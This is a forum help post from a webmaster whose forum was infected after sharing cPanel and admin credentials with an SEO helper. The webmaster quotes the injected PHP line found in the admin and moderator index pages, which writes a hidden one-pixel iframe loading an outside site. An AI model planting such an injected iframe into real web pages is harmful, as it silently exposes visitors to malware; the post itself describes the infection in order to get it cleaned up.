Hi i have recently some problem with seo, so i lately share my cpanel and forum username and pass with some error, but they did't improved that, and i also get error when i visit my forum and a google notification about virus in my inbox.

Partially problem solved by esotorisk But today i came to know when i install new anti-virus that virus is still there and my antivirus show infected page when i login in admincp and modcp but after little google serch i removed that from modcp/index.php and admincp/index.php.

the code which cause that is this - Warning Plz do go on this link itz suppose to some virus in horny site.
Code: 
echo "<iframe src=\"http://internetcountercheck.com/?click=700500\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

but how i have removed it from two pages but how can i know about others.
sunnyx12x21x Reviewed by sunnyx12x21x on . Trojoan.Html.Iframe.I [Guide and help] Hi i have recently some problem with seo, so i lately share my cpanel and forum username and pass with some error, but they did't improved that, and i also get error when i visit my forum and a google notification about virus in my inbox. Partially problem solved by esotorisk But today i came to know when i install new anti-virus that virus is still there and my antivirus show infected page when i login in admincp and modcp but after little google serch i removed that from modcp/index.php Rating: 5